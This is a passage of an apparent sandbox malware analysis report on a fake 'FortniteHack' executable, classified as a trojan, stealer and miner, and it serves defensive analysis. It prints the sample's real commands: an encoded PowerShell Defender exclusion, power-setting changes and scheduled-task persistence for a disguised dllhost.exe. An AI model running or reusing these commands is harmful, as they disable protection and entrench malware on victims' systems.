Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EF2800	2_2_00EF2800
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EAD810	2_2_00EAD810
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ECA810	2_2_00ECA810
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EE6010	2_2_00EE6010
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E9D1E0	2_2_00E9D1E0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ECE9C0	2_2_00ECE9C0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E941D0	2_2_00E941D0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EF41D0	2_2_00EF41D0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EA01A0	2_2_00EA01A0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EA89A0	2_2_00EA89A0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E98990	2_2_00E98990
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EAF190	2_2_00EAF190
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E9B960	2_2_00E9B960
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EC7170	2_2_00EC7170
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EA6940	2_2_00EA6940
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EA9150	2_2_00EA9150
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EE6920	2_2_00EE6920
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EC8130	2_2_00EC8130
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EFD90A	2_2_00EFD90A
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EAE900	2_2_00EAE900
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EC8900	2_2_00EC8900
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EC0110	2_2_00EC0110
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EE4110	2_2_00EE4110
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EC22F0	2_2_00EC22F0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00F022CA	2_2_00F022CA
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EA7AA0	2_2_00EA7AA0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EC8AA0	2_2_00EC8AA0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EA82B0	2_2_00EA82B0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EF12B0	2_2_00EF12B0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EF7AB0	2_2_00EF7AB0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EB3A90	2_2_00EB3A90
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EB5290	2_2_00EB5290
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ED8A70	2_2_00ED8A70
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E97240	2_2_00E97240
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EC3A50	2_2_00EC3A50
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00F08230	2_2_00F08230
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EF3A20	2_2_00EF3A20
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EB3200	2_2_00EB3200
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EE1A00	2_2_00EE1A00
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EF2210	2_2_00EF2210
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EF93E0	2_2_00EF93E0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EBABF0	2_2_00EBABF0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ECABF0	2_2_00ECABF0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ED93D0	2_2_00ED93D0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EA1BA0	2_2_00EA1BA0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EAE3A0	2_2_00EAE3A0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EC53A0	2_2_00EC53A0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EE7BB0	2_2_00EE7BB0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EADB80	2_2_00EADB80
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EA0B90	2_2_00EA0B90
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EB9360	2_2_00EB9360
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EDEB40	2_2_00EDEB40
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EA7B50	2_2_00EA7B50
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EDA350	2_2_00EDA350
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EE0350	2_2_00EE0350
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EB7320	2_2_00EB7320
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ED1320	2_2_00ED1320
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E97B00	2_2_00E97B00
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E9A300	2_2_00E9A300
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E98310	2_2_00E98310
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EAB310	2_2_00EAB310
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EEBCC0	2_2_00EEBCC0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EE84C0	2_2_00EE84C0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EFA4C0	2_2_00EFA4C0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E954D0	2_2_00E954D0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ED4CB0	2_2_00ED4CB0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ED6460	2_2_00ED6460
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EAEC70	2_2_00EAEC70
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EC3C70	2_2_00EC3C70
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EA2450	2_2_00EA2450
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EB5450	2_2_00EB5450
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EA4430	2_2_00EA4430
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EA0430	2_2_00EA0430
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EE3430	2_2_00EE3430
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EB2C00	2_2_00EB2C00
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EF1C00	2_2_00EF1C00
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EA4C10	2_2_00EA4C10
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EAD410	2_2_00EAD410
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EC3410	2_2_00EC3410
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EA0DE0	2_2_00EA0DE0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EBB5F0	2_2_00EBB5F0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ED7DF0	2_2_00ED7DF0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EB55C0	2_2_00EB55C0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ECDDD9	2_2_00ECDDD9
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E98DD0	2_2_00E98DD0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ECF5D0	2_2_00ECF5D0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EC7DD0	2_2_00EC7DD0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ECC5A0	2_2_00ECC5A0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00F15592	2_2_00F15592
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EB2D80	2_2_00EB2D80
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ECDD80	2_2_00ECDD80
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ECB560	2_2_00ECB560
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EF3D60	2_2_00EF3D60
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E9CD50	2_2_00E9CD50
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ECFD20	2_2_00ECFD20
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E99D30	2_2_00E99D30
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EA6530	2_2_00EA6530
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EB3530	2_2_00EB3530
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EB9D00	2_2_00EB9D00
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EEFD00	2_2_00EEFD00
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EE9500	2_2_00EE9500
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EA3510	2_2_00EA3510
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EC86E0	2_2_00EC86E0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ECD6E0	2_2_00ECD6E0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EDAEE0	2_2_00EDAEE0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E9B6F0	2_2_00E9B6F0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EB66F0	2_2_00EB66F0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EA76C0	2_2_00EA76C0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ECAEC0	2_2_00ECAEC0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ED3EA0	2_2_00ED3EA0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E916B0	2_2_00E916B0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EB5EB0	2_2_00EB5EB0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ED2E80	2_2_00ED2E80
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E99690	2_2_00E99690
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E9E690	2_2_00E9E690
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EE5690	2_2_00EE5690
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E9DE60	2_2_00E9DE60
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EF9E60	2_2_00EF9E60
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EF4640	2_2_00EF4640
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ED9650	2_2_00ED9650
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EA0620	2_2_00EA0620
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EBFE20	2_2_00EBFE20
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E9C610	2_2_00E9C610
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EB0E10	2_2_00EB0E10
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EF7E10	2_2_00EF7E10
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EE07F0	2_2_00EE07F0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EB6FC0	2_2_00EB6FC0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EE2FC0	2_2_00EE2FC0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00ED6F90	2_2_00ED6F90
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EEFF90	2_2_00EEFF90
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EA9740	2_2_00EA9740
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EB1F50	2_2_00EB1F50
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EA3F20	2_2_00EA3F20
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E9A700	2_2_00E9A700
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00F13718	2_2_00F13718
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00E9BF10	2_2_00E9BF10
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EB2F10	2_2_00EB2F10
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Code function: 15_2_0315F2E4	15_2_0315F2E4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_02AFB580	18_2_02AFB580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_02AFB570	18_2_02AFB570

Source: Joe Sandbox View

Dropped File: C:\ProgramData\Dllhost\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: String function: 0041A840 appears 98 times
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: String function: 0040B3D0 appears 47 times
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: String function: 00F0607C appears 44 times
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: String function: 00F0AE24 appears 34 times
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: String function: 00EFDE10 appears 97 times

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6684 -s 392

Source: winlogson.exe.15.dr

Static PE information: Number of sections : 11 > 10

Source: winlogson.exe.15.dr

Static PE information: No import functions for PE file found

Source: winlogson.exe.15.dr

Static PE information: Data appended to the last section found

Source: FortniteHack.exe1.exe, 00000002.00000003.2023196435.00000000035B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTask32Main.exe@ vs FortniteHack.exe1.exe
Source: FortniteHack.exe1.exe, 00000002.00000003.2023358262.0000000000C94000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTask32Main.exe@ vs FortniteHack.exe1.exe

Source: FortniteHack.exe1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: FortniteHack.exe1.exe	Static PE information: Section: .bss ZLIB complexity 1.0003236607142858
Source: FortniteHack.exe1.exe	Static PE information: Section: .bss ZLIB complexity 1.0003236607142858

Source: WinRing0x64.sys.15.dr

Binary string: \Device\WinRing0_1_2_0

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@33/17@2/3

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

Code function: 2_2_00443C10 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

2_2_00443C10

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6684
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6712:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Mutant created: \Sessions\1\BaseNamedObjects\ProgramV3

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

File created: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe

Jump to behavior

Source: FortniteHack.exe1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: FortniteHack.exe1.exe, 00000002.00000003.1247298093.0000000000C95000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1223070279.00000000035A5000.00000004.00000800.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1247077673.00000000035A3000.00000004.00000800.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1223466670.0000000000C77000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: FortniteHack.exe1.exe	Virustotal: Detection: 56%
Source: FortniteHack.exe1.exe	ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

File read: C:\Users\user\Desktop\FortniteHack.exe1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FortniteHack.exe1.exe "C:\Users\user\Desktop\FortniteHack.exe1.exe"
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Process created: C:\Users\user\Desktop\FortniteHack.exe1.exe "C:\Users\user\Desktop\FortniteHack.exe1.exe"
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6684 -s 392
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Process created: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe "C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe"
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAagBvAGkATwBEAFQAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEEAZQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAOQA2AGYAYwBEAHYAYwBjADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBKAE8AUwA4AHgAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAFUAagBvAGkATwBEAFQAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEEAZQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAOQA2AGYAYwBEAHYAYwBjADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBKAE8AUwA4AHgAIwA+AA=="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4422" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4422" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Process created: C:\Users\user\Desktop\FortniteHack.exe1.exe "C:\Users\user\Desktop\FortniteHack.exe1.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Process created: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe "C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAagBvAGkATwBEAFQAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEEAZQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAOQA2AGYAYwBEAHYAYwBjADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBKAE8AUwA4AHgAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4422" /TR "C:\ProgramData\Dllhost\dllhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAFUAagBvAGkATwBEAFQAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEEAZQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAOQA2AGYAYwBEAHYAYwBjADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBKAE8AUwA4AHgAIwA+AA=="	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4422" /TR "C:\ProgramData\Dllhost\dllhost.exe"

